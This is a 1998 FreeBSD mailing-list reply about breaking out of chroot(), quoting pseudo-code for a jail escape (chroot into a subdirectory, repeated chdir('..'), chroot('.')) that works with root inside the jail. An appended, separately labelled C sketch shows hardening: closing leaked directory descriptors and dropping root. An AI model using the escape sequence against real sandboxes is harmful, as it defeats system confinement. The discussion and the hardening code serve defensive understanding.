From: Don Lewis
Message-Id: <199811220345.TAA00182@salsa.gv.tsc.tdk.com>
Date: Sat, 21 Nov 1998 19:45:47 -0800
In-Reply-To: Eivind Eklund "Re: Question on chroot()" (Nov 17, 12:54pm)
To: Eivind Eklund, Mike Smith, Harold Gutch
Subject: Re: Question on chroot()
Cc: zhihuizhang, hackers
Sender: owner-freebsd-hackers@FreeBSD.ORG

On Nov 17, 12:54pm, Eivind Eklund wrote:
} Subject: Re: Question on chroot()
} On Sun, Nov 15, 1998 at 12:56:03PM -0800, Mike Smith wrote:
} > It's quite difficult to break out of a chroot'ed environment, yes, and
} > it's intended to be impossible, so obviously you can only get out
} > through flaws in the implementation...
}
} It is easy if you have root privileges inside the "jail".
}
} /* pseudo-code */
} mkdir("mybreakdir", 0700);
} breakfd = open(".", 0, 0);
} chroot("mybreakdir");
} fchdir(breakfd);
} for (i=0; i<1000; i++)
}     chdir("..");
} chroot(".");
}
} I'm not sure if you need the fchdir();

You don't.

} chroot() is not supposed to
} affect your current directory.  I don't think anybody has fixed the
} above problem; it seems quite difficult to fix (you have to know which
} FDs are inside and outside the jail, which is non-trivial).

I implemented a local hack to solve the problem, though it has some
limitations.  I've thought of a better scheme that I have yet to
implement.  When I do, I'll post it for comments.

--- Truck
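
Added example, not part of the original message and not the local hack or the kernel change it mentions: the application-side counterpart to the two conditions named in the thread, root inside the jail and a directory reference left outside it. The function names `close_dir_fds` and `enter_jail` and the bound 256 in `main` are hypothetical, chosen for this sketch.

```c
#define _DEFAULT_SOURCE 1   /* glibc: expose chroot() and setgroups() */
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <unistd.h>

/* Close every open descriptor in [lowfd, maxfd) that refers to a directory.
 * A directory fd opened before chroot() still names a directory outside the
 * new root, so it must not survive. Returns the number of fds closed. */
int close_dir_fds(int lowfd, int maxfd)
{
    int closed = 0;
    for (int fd = lowfd; fd < maxfd; fd++) {
        struct stat st;
        if (fstat(fd, &st) == 0 && S_ISDIR(st.st_mode) && close(fd) == 0)
            closed++;
    }
    return closed;
}

/* Enter `jail` and give up root for good. Returns 0 on success, -1 on any
 * failure; the caller must exit on -1 rather than run half-confined. */
int enter_jail(const char *jail, uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0)
        return -1;                      /* root inside the jail defeats it */
    if (chdir(jail) != 0)               /* put cwd inside the tree first   */
        return -1;
    if (chroot(".") != 0)               /* so cwd is never left outside    */
        return -1;
    close_dir_fds(0, (int)sysconf(_SC_OPEN_MAX));
    if (setgroups(1, &gid) != 0)        /* drop supplementary groups       */
        return -1;
    if (setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    if (setuid(0) == 0)                 /* must not be able to regain root */
        return -1;
    return 0;
}

int main(void)
{
    int fd = open(".", O_RDONLY);       /* constructed: a leaked directory fd */
    printf("leaked fd %d, closed %d directory fd(s)\n", fd, close_dir_fds(3, 256));
    return 0;
}
```

`enter_jail` needs root to succeed, so `main` only exercises the descriptor sweep, which runs unprivileged.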